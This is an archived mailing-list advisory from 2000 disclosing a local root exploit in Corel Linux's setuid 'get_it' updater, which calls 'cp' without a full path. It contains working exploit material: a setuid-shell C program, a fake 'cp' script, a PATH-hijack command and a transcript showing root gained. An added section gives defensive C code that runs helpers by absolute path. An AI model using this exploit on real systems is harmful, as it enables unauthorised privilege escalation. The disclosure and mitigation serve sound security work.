Serious Bug in Corel Linux.(Local root exploit)

From: tasconat_private
Date: Wed Jan 12 2000 - 00:26:49 PST

       Corel Linux comes with a program called "Corel Update" to manage the
    ".deb" files. This X-oriented program is setuid root. The program is
    "get_it" and it's located in the /usr/X11R6/bin directory.
    
      If you can run it, it's easy to get root privileges in your system.
    It copies two files to the temp directory, taking no care to verify how.
    In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!!
    
      The only thing you have to do to hack root is to change your PATH
    to execute your personal copy of the program.
    
      Let's see the example.
    ------------------------------ From here --------------------------------
    
    
    Script started on Wed Jan 12 01:58:17 2000
    CorelLinux:~$ id
    uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
    CorelLinux:~$ cat misu.c
    #include <stdio.h>
    #include <unistd.h>
    
    main(argc,argv)
    int argc;
    char **argv;
    {
    if (argc==2);
    setuid(atoi(argv[1]));
    execlp("/bin/bash","/bin/bash",NULL);
    }
    CorelLinux:~$ cc -o misu misu.c
    CorelLinux:~$ pwd
    /home/tascon
    CorelLinux:~$ cat cp
    echo $1 $2 $3
    /home/tascon/misu 0
    CorelLinux:~$ export PATH=.:$PATH
    CorelLinux:~$ get_it
    /usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
    CorelLinux:~# id
    uid=0(root) gid=1001(tascon) groups=1001(tascon)
    CorelLinux:~# exit
    exit
    /usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
    CorelLinux:~# id
    uid=0(root) gid=1001(tascon) groups=1001(tascon)
    
    Script done on Wed Jan 12 01:59:12 2000
    
    ---------------------------- To Here -----------------------------------
    
      Easy to patch, isn't it?
    
    
    
    *****************************************************************************
                                           /    Cesar Tascon Alvarez
      ( to ) ? be : !be                   /       University of Valladolid
                                         /                        (Spain)
         W. Shakespeare                 /      tasconat_private
                                       /
    *****************************************************************************
    
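The patch the author alludes to, as an added example that is not part of the original post: a privileged program that must run a helper names it by absolute path and hands the child a fixed environment, so the invoking user's PATH can never select which binary runs. run_trusted() is a hypothetical name; the example assumes a POSIX system with /bin/sh.

```c
/* Added example, not Corel's code: run a helper from a setuid program
 * without letting the caller's PATH (or IFS) influence what gets executed. */
#include <errno.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Environment the child receives, whatever the invoking user exported. */
static char *const trusted_envp[] = {
    "PATH=/usr/bin:/bin",
    "IFS= \t\n",
    NULL
};

/* Run `path` with `argv` under the fixed environment above.
 * Returns the child's exit status (0..255), or -1 with errno set when
 * `path` is not absolute or the child could not be started or reaped. */
int run_trusted(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/') {   /* a bare "cp" would be PATH-resolved */
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, trusted_envp);   /* execve() never consults PATH */
        _exit(127);                          /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status)) {
        errno = ECHILD;
        return -1;
    }
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const bad[] = {"cp", "/etc/hostname", "/tmp/hostname.copy", NULL};
    printf("relative name rejected: %d\n", run_trusted("cp", bad));
    /* The child sees the fixed PATH, not whatever the caller exported. */
    char *const ok[] = {"sh", "-c", "echo child PATH=$PATH", NULL};
    printf("exit status: %d\n", run_trusted("/bin/sh", ok));
    return 0;
}
```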



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:51 PDT